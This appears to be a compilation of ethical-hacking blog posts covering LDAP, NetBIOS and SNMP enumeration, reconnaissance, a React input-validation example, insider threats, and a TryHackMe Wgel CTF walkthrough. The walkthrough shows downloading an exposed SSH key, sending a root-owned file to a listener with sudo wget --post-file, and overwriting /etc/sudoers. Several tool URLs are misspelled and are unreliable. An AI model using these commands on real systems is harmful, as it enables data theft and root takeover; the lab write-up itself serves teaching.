LDAP Enumeration

LDAP stands for light weight directory access protocol and it is an internet protocol for accessing disturbed directory services like active directory or openLDAP etc. A directory service is a hirerchical and logical structure for storing records of users. LDAP is based on client and server transmitted b/w client and server using basic encoding rules (BER).


LDAP Enumeration - LDAP  supports anonymous remote query on the server. The query will disclose sensitive information such as username, address, contact details, department details etc.

LDAP Enumeration Tools

The following table shows the list of tools to perform LDAP enumeration.

1) Softerra LDAP

http://www.idapadministrator.com/


2) Jxplorer

http://jsxplorer.org/


3) Active directory domain services management pack for system center

https://www.microsoft.com/en-in/download/details.aspx?id=21357


4) LDAP Admin Tool

http://www.idapadmin.org/


5) LDAP adminstrator tool

https://sourceforge.netprojects/idapadmin/

LDAP Security Controls

The following are the security controls to prevent LDAP enumeration attacks.

# Use SSL to encrypt LDAP communication.

# Use kerberos to restrict the access to known users.

# Enable account lockout to restrict brute forcing.

Disclaimer

 

All tutorials are for informational and educational purposes only and have been made using our own routers, servers, websites and other vulnerable free resources. we do not contain any illegal activity. We believe that ethical hacking, information security and cyber security should be familiar subjects to anyone using digital information and computers. Hacking Truth is against misuse of the information and we strongly suggest against it. Please regard the word hacking as ethical hacking or penetration testing every time this word is used. We do not promote, encourage, support or excite any illegal activity or hacking.
 

NetBIOS  Enumeration

NetBIOS stands for network basic input output system. IBM developed it along with sytek. The primary intention of NetBIOS was developed as application programming interfae (API) to enable access to LAN resources by the client's software.

NetBIOS naming convention start with 16-ASCII character string used to identify the network devices over TCP/IP. 15 characters are used for the device name and the 16 characters is reserved for the service or name record type.

NetBIOS enumeration explained

NetBIOS software runs on PORT 139 on windows operating system file and printer service needs to be enabled to enumerate NetBIOS over windows operating system.

An attacker can perform the below on the remote machine.


1) Choose to read or write to a remote machine depending on the availability of shares.
2) Launch a Denial of Service (DOS) attack on the remote machine.
3) Enumerate password policies on the remote machine.

NetBIOS Enumeration Tools

The following tables shows the list of toolls to perform NetBIOS Enumeration.

Name of the tools and web links.

1) Nbstat - www.technet.microsoft.com

2) Superscan - https://www.mcafe.com/in/downloads/free-tools/superscan.aspx

3) Hyena - http://www.systemtools.com/hyena

4) winfingerprint - http://packetstormsercurity.com/files/38356/winfingerprint-0.6.2.zip.html

NetBIOS security controls 

The following are the security controls to prevent NetBIOS enumeration attacks.

# Minimize the attack surface by minimizing the unnecessary service like server message block (SMB).

# Remove file and printer sharing in windows OS.

Disclaimer

All tutorials are for informational and educational purposes only and have been made using our own routers, servers, websites and other vulnerable free resources. we do not contain any illegal activity. We believe that ethical hacking, information security and cyber security should be familiar subjects to anyone using digital information and computers. Hacking Truth is against misuse of the information and we strongly suggest against it. Please regard the word hacking as ethical hacking or penetration testing every time this word is used. We do not promote, encourage, support or excite any illegal activity or hacking.

Enumeration Using SNMP

SNMP stands for simple network management protocol is an application layer protocol which uses UDP protocol to maintain and manages routers, switch, hubs other devices on an IP network. SNMP is a very common protocol found enabled on a variety of operating system like windows server, linux and unix server as well as network devices like routers, switches etc.


SNMP enumeration is used to enumerate user accoundts, passwords, group, system names, devices on a target system.


It consists of three major elements :


1) SNMP Manager (Managed Devices) - A managed device is a device or a host (technically known as node) which has the SNMP services enabled. These devices could be routers, switches, hubs, bridges computer etc.

OR

It is a contralised system used to monitor-network. It is also known as network management station (NMS).


2) SNMP Agent - It is a software management devices can be network devices. Managed devices can be network devices like PC, routers, switches server etc.

3) Management information Base - MIB consists of information of resources that are to tbe managed. These infromation is organised hi-erachically. It consists of objects instances which are essentially variables.

SNMP Messages

In snmp there are different variables are -


1) GetRequest - SNMP manager sends from SNMP agent. It is simply used to retieve data from snmp agent. In response to this, snmp agent responds with requested value thorugh response messages.

2) GetNextRequest - This message can be sent to discover what data is available on a SNMP agent. The snmp manager can request for data continuously until no more data is left. In this way, SNMP manager can take knowledege of all the available data on SNMP agent.


3) GetBulkRequest - This message is used to retrieve large data at once by the SNMP agent. It is introduced in SNMPv2c

4) SetRequest - It is used to SNMP manager to set the value of an obbject instance an the SNMP agent.

5) Response - It is a message send from agent upon a request from manager. When sent in response to set messages, it will contain the newly set value as confirmation that the value has been set.

6) Trap - These are messages send by the agent without being requested by the manager. It is sent when a fault has occured.

7) InformRequest - It was introduced in SNMPv2c, used to identify if the trap message has been received by the manager or not. The agent can be configured to set up trap continuously until it receives an inform messages. It is same as trap but adds an acknowledge that trap doesn't provide.



SNMP Versions - There are 3 version  of SNMP.


1) SNMPv1 - It uses community strings for authentication. It uses UDP but can be configured to use TCP.

2) SNMPv2 - It uses community strings for authentication. It uses UDP but can configured to use TCP.

3) SNMPv3 - It uses Hash based MAC with MD5 or SHA for authentication and DES-56 for privacy. This version uses TCP. Therefor conclusion is the higher the version for SNMP, more secure it will be.



SNMP Security Levels -  It defines the type of security algorithm performs on SNMP packets. There are used in only SNMPv3. There are 3 security leveles namely.


1) NoAuthentication - This ( no authentication no privacy ) security level uses community string for authentication and no encryption for privacy.

2) authNopriv - This security level (authentication, no privacy) uses HMAC and MD5 or SHA for authentication and encryption uses DES-56 Algorithm.



SNMP Enumeration - Default SNMP to view or modify then SNMP can configuration settings. Attackers can enumerate SNMP on remote network devices for the following -

# Information about network resources such as routers, share, devices etc.

# ARP and routing tables.

# Device specific information

# Traffic statistic etc.

SNMP Enumeration Tools

The following table shows the list of tools to perform SNMP Enumeration.


Name of the Tool and weblinks

1) Oputils


www.manageengine.com/products/oputils


2) Solarwinds

www.solarwinds.com

 

3) SNScan

www.mcafee.com/us/downloads/free-tools/scscan.aspx

4) SNMP Scanner

http://www.secure-bytes.com/snmp-scanner.php

Disclaimer

All tutorials are for informational and educational purposes only and have been made using our own routers, servers, websites and other vulnerable free resources. we do not contain any illegal activity. We believe that ethical hacking, information security and cyber security should be familiar subjects to anyone using digital information and computers. Hacking Truth is against misuse of the information and we strongly suggest against it. Please regard the word hacking as ethical hacking or penetration testing every time this word is used. We do not promote, encourage, support or excite any illegal activity or hacking.

Taxonomy of Reconnaissance

In a red team operation, you might start with no more than a company name, from which you need to start gathering information about the target. This is where reconnaissance comes into play. Reconnaissance (recon) can be defined as a preliminary survey or observation of your target (client) without alerting them to your activities. If your recon activities create too much noise, the other party would be alerted, which might decrease the likelihood of your success.

Reconnaissance (recon) can be classified into two parts:

# Passive Recon: can be carried out by watching passively
# Active Recon: requires interacting with the target to provoke it in order to observe its response.


Passive recon doesn't require interacting with the target. In other words, you aren't sending any packets or requests to the target or the systems your target owns. Instead, passive recon relies on publicly available information that is collected and maintained by a third party. Open Source Intelligence (OSINT) is used to collect information about the target and can be as simple as viewing a target's publicly available social media profile. Example information that we might collect includes domain names, IP address blocks, email addresses, employee names, and job posts. In the upcoming task, we'll see how to query DNS records and expand on the topics from the Passive Reconnaissance room and introduce advanced tooling to aid in your recon.


Active recon requires interacting with the target by sending requests and packets and observing if and how it responds. The responses collected - or lack of responses - would enable us to expand on the picture we started developing using passive recon. An example of active reconnaissance is using Nmap to scan target subnets and live hosts. Other examples can be found in the Active Reconnaissance room. Some information that we would want to discover include live hosts, running servers, listening services, and version numbers.



Active recon can be classified as:


# External Recon: Conducted outside the target's network and focuses on the externally facing assets assessable from the Internet. One example is running Nikto from outside the company network.

# Internal Recon: Conducted from within the target company's network. In other words, the pentester or red teamer might be physically located inside the company building. In this scenario, they might be using an exploited host on the target's network. An example would be using Nessus to scan the internal network using one of the target’s computers.

Disclaimer

All tutorials are for informational and educational purposes only and have been made using our own routers, servers, websites and other vulnerable free resources. we do not contain any illegal activity. We believe that ethical hacking, information security and cyber security should be familiar subjects to anyone using digital information and computers. Hacking Truth is against misuse of the information and we strongly suggest against it. Please regard the word hacking as ethical hacking or penetration testing every time this word is used. We do not promote, encourage, support or excite any illegal activity or hacking.

TryHackMe Wgel CTF Exfiltrate the root flag

Wgel CTF is a TryHackMe machine, after listing the website we found a private key that gave us SSH access. We escalate privileges by modifying the sudoers file with Wget.


First we start with NMAP tool. TCP port scan, we see two open ports http (80) and ssh (22).

┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/wgel-again]
└─$ sudo nmap -O 10.10.56.251                        
[sudo] password for hackerboy: 
Starting Nmap 7.93 ( https://nmap.org ) at 2023-07-28 23:49 IST
Nmap scan report for 10.10.56.251
Host is up (0.21s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.93%E=4%D=7/28%OT=22%CT=1%CU=40458%PV=Y%DS=2%DC=I%G=Y%TM=64C406D
OS:2%P=x86_64-pc-linux-gnu)SEQ(SP=105%GCD=1%ISR=107%TI=Z%CI=I%TS=A)SEQ(SP=1
OS:05%GCD=1%ISR=107%TI=Z%CI=I%II=I%TS=A)OPS(O1=M508ST11NW6%O2=M508ST11NW6%O
OS:3=M508NNT11NW6%O4=M508ST11NW6%O5=M508ST11NW6%O6=M508ST11)WIN(W1=68DF%W2=
OS:68DF%W3=68DF%W4=68DF%W5=68DF%W6=68DF)ECN(R=Y%DF=Y%T=40%W=6903%O=M508NNSN
OS:W6%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%D
OS:F=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O
OS:=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W
OS:=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%R
OS:IPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)

Network Distance: 2 hops

OS detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 31.04 seconds
                                                                                                                                                                        
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/wgel-again]
└─$ 

HTTP

Apache is running on port 80. 

GOBUSTER

Directory and file scanning with gobuster.

┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/wgel-again]
└─$ sudo gobuster dir -u http://10.10.56.251/ -w /usr/share/dirb/wordlists/common.txt -t 25 -x php,html,txt -q
[sudo] password for hackerboy: 
/.html                (Status: 403) [Size: 277]
/.htpasswd.txt        (Status: 403) [Size: 277]
/index.html           (Status: 200) [Size: 11374]
/index.html           (Status: 200) [Size: 11374]
/server-status        (Status: 403) [Size: 277]
/sitemap              (Status: 301) [Size: 314] [--> http://10.10.56.251/sitemap/]
                                                                                                                                                                        
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/wgel-again]
└─$

Page web and /sitemap/

 Again we do a scan with gobuster but now to the page we found ( /sitemap/). 

┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/wgel-again]
└─$ sudo gobuster dir -u http://10.10.56.251/sitemap -w /usr/share/dirb/wordlists/common.txt -t 25 -x php,html,txt -q
[sudo] password for hackerboy: 

/.htpasswd.txt        (Status: 403) [Size: 277]
/.htpasswd.php        (Status: 403) [Size: 277]
/.ssh                 (Status: 301) [Size: 319] [--> http://10.10.56.251/sitemap/.ssh/]
/about.html           (Status: 200) [Size: 12232]
/blog.html            (Status: 200) [Size: 12745]
/contact.html         (Status: 200) [Size: 10346]
/css                  (Status: 301) [Size: 318] [--> http://10.10.56.251/sitemap/css/]
/fonts                (Status: 301) [Size: 320] [--> http://10.10.56.251/sitemap/fonts/]
/images               (Status: 301) [Size: 321] [--> http://10.10.56.251/sitemap/images/]
/index.html           (Status: 200) [Size: 21080]
/index.html           (Status: 200) [Size: 21080]
/js                   (Status: 301) [Size: 317] [--> http://10.10.56.251/sitemap/js/]
/services.html        (Status: 200) [Size: 10131]
/shop.html            (Status: 200) [Size: 17257]
/work.html            (Status: 200) [Size: 11428]
                                                                                                                                                                        
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/wgel-again]
└─$ 

SSH - Jessie

We start session with Jessieand the private key we found earlier, we get an ssh shell and our first flag user_flag.txt .

An id_rsa key can be used as an alternative method to log into SSH. Meaning, we do not need a password! Maybe we can try this against the Jessie user found earlier?

Initial Access

Download the id_rsa key from the webserver with wget:

┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/wgel-again]
└─$ wget http://10.10.56.251/sitemap/.ssh/id_rsa -O ./id_rsa.txt                                            
--2023-07-29 01:22:03--  http://10.10.56.251/sitemap/.ssh/id_rsa
Connecting to 10.10.56.251:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 1675 (1.6K)
Saving to: ‘./id_rsa.txt’

./id_rsa.txt                              100%[=====================================================================================>]   1.64K  --.-KB/s    in 0s      

2023-07-29 01:22:03 (43.1 MB/s) - ‘./id_rsa.txt’ saved [1675/1675]

                                                                                                                                                                        
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/wgel-again]
└─$ 

Now login as Jessie:

$ chmod 600 id_rsa.txt
$ sudo chown hackerboy:hackerboy id_rsa.txt
$ ssh jessie@10.10.56.251 -i id_rsa.txt

 

Privilege Escalation

Next, we need to read the root user flag. In order to do so, we need root privileges.

A good first check is to run sudo -l to list what we can run as root:

Click on this link to learn about sudo -l (all about enumeration) - CLICK HERE

 There are two entries here: (1) we can run all commands as root, but need to know Jessie’s password, and (2) we can run wget as root.

According to the amazing GTFOBins repo we can use wget to read files. We’ll use this technique to read the root user’s flag:

sudo /usr/bin/wget --post-file=/root/root_flag.txt http://10.9.22.119:4545

# This is our system IP 10.9.22.119

# we will same port from both side 4545

Netcat listener

nc  -lvp 4545

Root flag - b1b968b37519ad1daa6408188649263d

And in the wgel machine we execute the wget command with sudo which will overwrite the file /etc/sudoers.

We are located in the folder /etc/and we execute:

sudo /usr/bin/wget 10.9.22.119:4545/sudoers --output-document=sudoers

Disclaimer

All tutorials are for informational and educational purposes only and have been made using our own routers, servers, websites and other vulnerable free resources. we do not contain any illegal activity. We believe that ethical hacking, information security and cyber security should be familiar subjects to anyone using digital information and computers. Hacking Truth is against misuse of the information and we strongly suggest against it. Please regard the word hacking as ethical hacking or penetration testing every time this word is used. We do not promote, encourage, support or excite any illegal activity or hacking.

Safe Input or Character 

Today in this blog, we will aware about How to remove array object elements in reactsjs. So, without wasting any time lets do it but lets recap what is exactly React js.

React

Certainly, Reactjs is a JavaScript library developed by Facenook for building user interfaces. It allows developers to create reusable UI components and effciently manage the state of their applications. Here are some key aspects of Reactjs.


Component-Based Architecture: ReactJS follows a component-based architecture, where the user interface is divided into small, reusable components. Components encapsulate their own logic, state, and rendering, making it easier to build and maintain complex user interfaces.



Virtual DOM: ReactJS uses a virtual representation of the DOM (Document Object Model), known as the Virtual DOM. When the state of a component changes, React updates the Virtual DOM.



JSX: JSX is a syntax extension for JavaScript used in React. It allows developers to write HTML-like code within JavaScript, making it easier to describe the structure and appearance of components. JSX code is transpiled to regular JavaScript using tools like Babel before being executed in the browser.


Hooks: React introduced Hooks in version 16.8 as a way to use state and other React features in functional components. Hooks allow developers to write reusable logic and manage state within functional components without the need for class components. The most commonly used hooks are useState for managing state and useEffect for handling side effects such as fetching data or subscribing to events.


React Router: React Router is a popular routing library for React applications. It enables developers to create single-page applications with multiple views and handles routing between different components based on the URL.


State Management: React provides a flexible ecosystem of state management solutions. While React's built-in state management (useState ) is suitable for managing local component state, more complex applications may benefit from additional state management libraries like Redux. These libraries help manage global application state and provide predictable ways to update and access the state.


ReactJS has gained widespread popularity due to its performance, reusability, and declarative approach to building user interfaces. It has large community.


NOTE - Here we will Tailwind CSS for designing.

In ReactJS, the user input can be compared to a list of safe characters or patterns by implementing input validation within the form component. React provides various ways to handle form inputs and validate user input. Here's an example of how you can do it:

Here we first make a file as called SafeInputForm.jsx.

import React, { useState } from 'react';

const SafeInputForm = () => {
  
  const safeCharacters = /^[a-zA-Z0-9]*$/;

 
  const [userInput, setUserInput] = useState('');
  const [errorMessage, setErrorMessage] = useState('');

  
  const handleSubmit = (event) => {
    event.preventDefault();

    // Check if the input is safe
    if (safeCharacters.test(userInput)) {
      
      alert('Input is valid!');
    } else {
     
      setErrorMessage('Invalid input! Please only use alphanumeric characters.');
    }
  };

 
  const handleInputChange = (event) => {
    
    setUserInput(event.target.value);
  };

  return (
    <form onSubmit={handleSubmit}>
      <label htmlFor="user_input">Enter your input:</label>
      <input
        type="text"
        name="user_input"
        id="user_input"
        value={userInput}
        onChange={handleInputChange}
      />
      <input type="submit" value="Submit" />
      {errorMessage && <p>{errorMessage}</p>}
    </form>
  );
};

export default SafeInputForm;

 
In this example, we define a regular expression safeCharacters that matches only alphanumeric characters. We use the useState hook to keep track of the user input and any error messages related to input validation.

The handleSubmit function is called when the form is submitted. It checks whether the user input matches the safeCharacters regular expression. If the input is valid, the form is processed (you can do additional actions like saving data to the server or performing some other task). If the input contains unsafe characters, an error message is displayed on the form.

The handleInputChange function is used to update the userInput state whenever the input field value changes.


In your main application file (app.jsx), you can include the SafeInputForm component, which will render the form on the page.


Output

if we dont enter alphanumeric character and using with space its generate error like invalid input, please only use alphanumeric characters.

Disclaimer

All tutorials are for informational and educational purposes only and have been made using our own routers, servers, websites and other vulnerable free resources. we do not contain any illegal activity. We believe that ethical hacking, information security and cyber security should be familiar subjects to anyone using digital information and computers. Hacking Truth is against misuse of the information and we strongly suggest against it. Please regard the word hacking as ethical hacking or penetration testing every time this word is used. We do not promote, encourage, support or excite any illegal activity or hacking.

Insider threat actor

Insider threat actor is the one who working for the company internal employees we used to say that employee has more access to the resources so they can have a further damage.

How to  prevent this insider threat actor by doing a proper background check before hiring any candidate!!!

Live example people use to say that the information was breached by Edward Snowden.
Edward Snowden was a insider for a them which reveal the information for the NSA.

Edward Snowden is often considered a controversial figure who gained notoriety as an insider threat actor. In 2013, Snowden, a former contractor for the National Security Agency (NSA) in the United States, leaked classified documents to the media, revealing extensive surveillance programs conducted by the NSA 

Snowden's actions were seen as a significant breach of trust and a clear example of an insider threat. A

 

Here are the primary categories of insider threats and their corresponding descriptions:

# Fraud - In this type of insider threat, an individual within the organization misuses their authorized access to steal, alter, or delete data with the intention of deceiving the company or gaining personal benefit.

# Sabotage - This category of insider threat involves an authorized employee or insider who maliciously exploits their legitimate network access to sabotage or harm the company's systems, data, or operations.

Please note that insider threats can manifest in various forms, and these two categories represent common motivations and actions that malicious insiders may undertake. Preventing and mitigating such threats requires a comprehensive security approach that includes employee training, access control measures, and monitoring for suspicious activities.

Disclaimer

All tutorials are for informational and educational purposes only and have been made using our own routers, servers, websites and other vulnerable free resources. we do not contain any illegal activity. We believe that ethical hacking, information security and cyber security should be familiar subjects to anyone using digital information and computers. Hacking Truth is against misuse of the information and we strongly suggest against it. Please regard the word hacking as ethical hacking or penetration testing every time this word is used. We do not promote, encourage, support or excite any illegal activity or hacking.